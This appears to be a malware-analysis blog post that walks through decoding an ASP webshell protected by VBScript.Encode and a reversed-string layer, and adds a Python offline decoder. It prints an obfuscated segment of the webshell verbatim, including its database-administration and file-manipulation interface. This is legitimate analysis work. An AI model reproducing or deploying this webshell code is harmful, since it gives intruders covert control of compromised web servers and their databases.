Decoding an ASP trojan: a webshell with randomised encryption

2019-04-01 16:06:22 王冬梅


First, the outer layer is VBScript.Encode, the encoding produced by Microsoft's screnc.exe; it runs wherever the Microsoft script engines run, which is why webshell authors like it. It is a keyless, reversible encoding rather than real encryption: the blob starts with #@~^ and ends with ^#~@, and any of the many online VBScript.Encode decoders will undo it. Two things to watch: the encoding works byte by byte and passes non-ASCII bytes through unchanged, so a file that contains Chinese text (this one is served as gb2312) has to be read and decoded as bytes in that code page, not as Unicode; and the special characters inside the blob must be handled the way the decoder expects, otherwise the output is corrupt.

After the VBScript.Encode layer is removed the result still looks like garbage, but now a lot of the function code has surfaced. Reading it closely shows a second, home-made layer: the real page is stored as an obfuscated string, a custom function restores it, and the result is handed to ExeCuTe, so the plaintext only ever exists at run time.

Encrypted pages come in two kinds, static and dynamic. A static page carries the whole ciphertext together with its decoding routine and can be decoded offline; a dynamic page derives part of the plaintext at run time (from the request, the session or a remote fetch), and that kind usually has to be stood up under IIS before it can be decoded. Here the routine and the string are both in the file, so take the first encrypted segment. In VBScript the English colon (:) joins several statements on one line, so it behaves like a line break; splitting on it isolates the tail of the decoding function (UZSS = NewStr, End Function), the assignment of the obfuscated string to ShiSan, and the ExeCuTe(UZSS(ShiSan)) call. The string is evidently the real page written backwards (its tail, >lmth<↙SRR, is RRS"<html> reversed), with ↙ standing in for the double quote, which is why it appears doubled where VBScript escapes a quote inside a literal, and ∞ separating the statements. Extracted, the first segment is:

UZSS = NewStr:End Function:ShiSan="↙>↙ srr∞↙on=llorcs ↙ SRR neht ↙↙=noitcA fI∞ ↙ydob<↙ srr∞↙>tpircs/<↙SRR∞↙};eurt nruter;)(timbus.mroFbD;↙↙↙↙=LMTHrenni.cba;gp = eulav.egaP.mroFbD;rts = eulav.rtSlqS.mroFbD};eslaf nruter;)↙↙!确正否是句语LQS查检请↙↙(trela{)01<htgnel.rts(fi};eslaf nruter;)↙↙!确正否是串接连库据数查检请 ↙↙(trela{)5<htgnel.eulav.rtSbD.mroFbD(fi{)gp,rts(rtSlqSlluF noitcnuf↙SRR∞↙};eurt nruter};]i[rtS = eulav.rtSlqS.mroFbD{esle};)]i[rtS(trela{)21==i(fi esle};↙↙>retnec/<。句语令命作操LQS入输再库据数接连己认确请>retnec<↙↙=LMTHrenni.cba;↙↙↙↙ = eulav.rtSlqS.mroFbD;]i[rtS = eulav.rtSbD.mroFbD{)3=<i(fi;↙↙。节字个十五前的段字示显只据数条一过超n.现实询查制控件条用可,节字部全的段字示显可即时据数条一示显只当↙↙ =]21[rtS;↙↙SSAP NMULOC PORD ]emaNelbaT[ ELBAT RETLA↙↙ =]11[rtS;↙↙)23(RAHCRAV SSAP NMULOC DDA ]emaNelbaT[ ELBAT RETLA↙↙ =]01[rtS;↙↙]emaNelbaT[ ELBAT PORD↙↙ = ]9[rtS;↙↙))05(RAHCRAV RESU,LLUN TON )1,1( YTITNEDI TNI DI(]emaNelbaT[ ELBAT ETAERC↙↙ = ]8[rtS;↙↙001=DI EREHW 'emanresu'=RESU TES ]emaNelbaT[ ETADPU↙↙ = ]7[rtS;↙↙001=DI EREHW ]emaNelbaT[ MORF ETELED↙↙ = ]6[rtS;↙↙)'drowssap','emanresu'(SEULAV )SSAP,RESU(]emaNelbaT[ OTNI TRESNI↙↙ = ]5[rtS;↙↙001<DI EREHW ]emaNelbaT[ MORF * TCELES↙↙ = ]4[rtS;↙↙emaNnsD=nsD↙↙ = ]3[rtS;↙↙****=dwP;toor=diU;emaNbD=esabataD;6033=troP;↙&PIrevreS&↙=revreS;}lqSyM{=revirD↙↙ = ]2[rtS;↙↙****=dwP;as=diU;emaNbD=esabataD;3341,↙&PIrevreS&↙=revreS;}revreS lqS{=revirD↙↙ = ]1[rtS;↙↙***=drowssaP esabataD:BDELO teJ;bdm.bd↙&))↙htaPredloF↙(noisseS(htaPeR&↙=ecruoS ataD;0.4.BDELO.teJ.tfosorciM=redivorP↙↙ = ]0[rtS;)21(yarrA wen = rtS};eslaf nruter{)0<i(fi{)i(rtSbDlluF noitcnuf↙SRR∞↙};eurt nruter};eslaf nruter;)0(rtSbDlluF;)↙↙库据数接连先请↙↙(trela{)↙↙↙↙ == eulav.rtSbD.mroFbD(fi{)(kcehCbD noitcnuf↙SRR∞↙}};↙↙↙↙ = eulav.emaNF.mrofedih.pot{esle};)(timbus.mrofedih.pot;noitcAF = eulav.noitcA.mrofedih.pot{)llun=!emaND(fi};↙↙rehtO↙↙ = emaND{esle};emaND = eulav.emaNF.mrofedih.pot;)emaNF,↙↙!在存否是件文意注,称名全件文bdM的缩压要入输请↙↙(tpmorp = emaND{)↙↙bdMtcapmoC↙↙==noitcAF(fi esle};emaND = eulav.emaNF.mrofedih.pot;)emaNF,↙↙!名同能不意注,称名全件文bdM的建新要入输请↙↙(tpmorp = 
emaND{)↙↙bdMetaerC↙↙==noitcAF(fi esle};emaND = eulav.emaNF.mrofedih.pot;)emaNF,↙↙称名全夹件文的建新要入输请↙↙(tpmorp = emaND{)↙↙redloFweN↙↙==noitcAF(fi esle};emaND+↙↙||||↙↙ =+ eulav.emaNF.mrofedih.pot;)emaNF,↙↙称名全夹件文标目到动移入输请↙↙(tpmorp = emaND{)↙↙redloFevoM↙↙==noitcAF(fi esle};emaND+↙↙||||↙↙ =+ eulav.emaNF.mrofedih.pot;)emaNF,↙↙称名全夹件文标目到动移入输请↙↙(tpmorp = emaND{)↙↙redloFypoC↙↙==noitcAF(fi esle};emaND+↙↙||||↙↙ =+ eulav.emaNF.mrofedih.pot;)emaNF,↙↙称名全件文标目到动移入输请↙↙(tpmorp = emaND{)↙↙eliFevoM↙↙==noitcAF(fi esle};emaND+↙↙||||↙↙ =+ eulav.emaNF.mrofedih.pot;)emaNF,↙↙称名全件文标目到制复入输请↙↙(tpmorp = emaND{)↙↙eliFypoC↙↙==noitcAF(fi;emaNF = eulav.emaNF.mrofedih.pot{)noitcAF,emaNF(mroFlluF noitcnuf↙SRR∞↙};)(timbus.mrofrdda.pot;redloF = eulav.htaPredloF.mrofrdda.pot{)redloF(redloFwohS noitcnuf↙SRR∞↙;)(kcolCnur};yalpsid+↙↙-- ↙&DA&↙→↙↙=sutats.wodniw;)(gnirtSelacoLot.yadot =yalpsid rav;)(etaD wen = yadot rav;)001 ,↙↙)(kcolCnur↙↙(tuoemiTtes.wodniw = emiTeht{)(kcolCnur noitcnuf↙SRR∞↙};eslaf nruter esle;eurt nruter))↙↙?吗作操此行执要认确↙↙(mrifnoc( fi{)(kosey noitcnuf↙SRR∞↙;srorrEllik=rorreno.wodniw};eurt nruter{)(srorrEllik noitcnuf>tpircsavaj=egaugnal tpircs<↙SRR∞↙>elyts/<↙SRR∞↙};xp11:ezis-tnof;888#:roloc{ma.↙SRR∞↙}000#:dnuorgkcab;der:roloc{revoh:a};enon :noitaroced-txet;ddd#:roloc{a↙SRR∞↙}000000# :ROLOC-ESAB-RABLLORCS;cfcf00# :ROLOC-WODAHSKRAD-RABLLORCS;000000# :ROLOC-KCART-RABLLORCS;cfcf00# :ROLOC-WORRA-RABLLORCS;cfcf00# :ROLOC-WODAHS-RABLLORCS;cfcf00# :ROLOC-THGILHGIH-RABLLORCS;000000# :ROLOC-ECAF-RABLLORCS{ YDOB↙SRR∞↙};xp4:tfel-nigram;xp0 :nigram{ydob↙SRR∞↙}FFF#:roloc;000#:roloc-dnuorgkcab{dmc.↙SRR∞↙}xp0:redrob;000000#:roloc-dnuorgkcab{C.↙SRR∞↙}fff# dilos xp1:redrob;↙&udub&↙:roloc-dnuorgkcab;xp21 :ezis-tnof{aeratxet,tceles,tupni↙SRR∞↙};↙&zw&↙:roloc;↙&jb&↙:roloc-dnuorgkcab;xp21 :ezis-tnof{dt,ydob↙SRR∞↙>↙↙ssc/txet↙↙=epyt elyts<↙SRR∞↙>eltit/< ↙&PIrevreS&↙ - ↙&emaNm&↙>eltit<↙SRR∞↙>↙↙2132bg=tesrahc ;lmth/txet↙↙=tnetnoc ↙↙epyT-tnetnoC↙↙=viuqe-ptth atem<>lmth<↙SRR":ExeCuTe(UZSS(ShiSan)):
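The decoder below is an added example, not code from the post or from the webshell. The page never shows the body of UZSS; treating it as a string reversal plus two character substitutions (a double quote for ↙, a statement separator for ∞) is an inference from the extracted literal, which reads correctly backwards, has ↙↙ exactly where VBScript doubles a quote inside a string literal, and has ∞ between the RRS calls. The sample input is the verbatim tail of the ShiSan literal above, which decodes to the first three statements of the real page. extract_payload locates the ShiSan="...":ExeCuTe(UZSS(ShiSan)) stub in the VBScript.Encode-decoded text, uzss_decode undoes the custom layer, and html_view renders the RRS statements with concatenated variables shown as {name} so the page skeleton stays readable.

```python
"""Offline decoder for the custom UZSS/ShiSan layer of the webshell above.

Added example; it is neither the post's nor the webshell's own code.
Assumption: the page never shows the body of UZSS.  Treating it as a string
reversal plus two character substitutions is inferred from the extracted
literal, which reads correctly backwards, has pairs of '↙' exactly where
VBScript doubles a quote inside a string literal, and has '∞' between
successive RRS statements.
"""
import re

MARKER_QUOTE = "↙"    # U+2199: assumed stand-in for the double quote
MARKER_NEWLINE = "∞"  # U+221E: assumed stand-in for the statement separator

# Constructed sample: the verbatim tail of the ShiSan literal quoted on the
# page (the tail of the reversed string is the head of the real page).
SAMPLE_SHISAN = (
    "↙>↙↙ssc/txet↙↙=epyt elyts<↙SRR∞"
    "↙>eltit/< ↙&PIrevreS&↙ - ↙&emaNm&↙>eltit<↙SRR∞"
    "↙>↙↙2132bg=tesrahc ;lmth/txet↙↙=tnetnoc "
    "↙↙epyT-tnetnoC↙↙=viuqe-ptth atem<>lmth<↙SRR"
)

# Constructed sample: the same literal in the context it has in the
# VBScript.Encode-decoded source (end of UZSS, assignment, Execute stub).
SAMPLE_DECODED_VBS = (
    'UZSS = NewStr:End Function:ShiSan="' + SAMPLE_SHISAN
    + '":ExeCuTe(UZSS(ShiSan)):'
)


def extract_payload(decoded_vbs, var="ShiSan", func="UZSS"):
    """Return the obfuscated literal from <var>="...":Execute(<func>(<var>)).

    The literal can be delimited by its quotes because the obfuscation
    replaced every real quote with a marker.  VBScript identifiers and
    keywords are case-insensitive, so the match is too.
    """
    v, f = re.escape(var), re.escape(func)
    pattern = re.compile(
        v + r'\s*=\s*"([^"]*)"\s*:\s*Execute\s*\(\s*' + f
        + r'\s*\(\s*' + v + r'\s*\)\s*\)',
        re.IGNORECASE,
    )
    m = pattern.search(decoded_vbs)
    if m is None:
        raise ValueError("no %s=...:Execute(%s(%s)) stub found" % (var, func, var))
    return m.group(1)


def uzss_decode(payload):
    """Undo the custom layer: reverse, then restore quotes and separators."""
    return (payload[::-1]
            .replace(MARKER_QUOTE, '"')
            .replace(MARKER_NEWLINE, "\n"))


# One VBScript string literal (with "" as the escaped quote) or one identifier.
_TOKEN = re.compile(r'"((?:[^"]|"")*)"|([A-Za-z_]\w*)')


def render_rrs(statement):
    """Render RRS"<title>"&mName&"</title>" as <title>{mName}</title>.

    Returns None for statements that are not RRS calls.  Variables spliced
    in with & are shown as {name}; doubled quotes are unescaped.
    """
    m = re.match(r"\s*RRS\b", statement, re.IGNORECASE)
    if m is None:
        return None
    parts = []
    for literal, ident in _TOKEN.findall(statement[m.end():]):
        parts.append("{%s}" % ident if ident else literal.replace('""', '"'))
    return "".join(parts)


def html_view(decoded_code):
    """The HTML/JS the shell writes to the browser, one entry per RRS call."""
    views = (render_rrs(line) for line in decoded_code.split("\n"))
    return [v for v in views if v is not None]


if __name__ == "__main__":
    code = uzss_decode(extract_payload(SAMPLE_DECODED_VBS))
    print(code)
    print("--- rendered ---")
    print("\n".join(html_view(code)))
```

Feed the whole ShiSan literal through uzss_decode to get the complete page. The decoded statements are where the triage indicators live: the Microsoft.Jet.OLEDB.4.0, {Sql Server} and {MySql} connection-string templates, the CREATE/ALTER/DROP TABLE snippets, and the CopyFile, MoveFile, CopyFolder, MoveFolder, NewFolder, CreateMdb and CompactMdb actions are all visible once the string is reversed. If a sample's custom function turns out to do more than this (the dynamic case), the fallback is an isolated IIS with ExeCuTe(UZSS(ShiSan)) replaced by Response.Write(UZSS(ShiSan)), so the plaintext is emitted instead of executed.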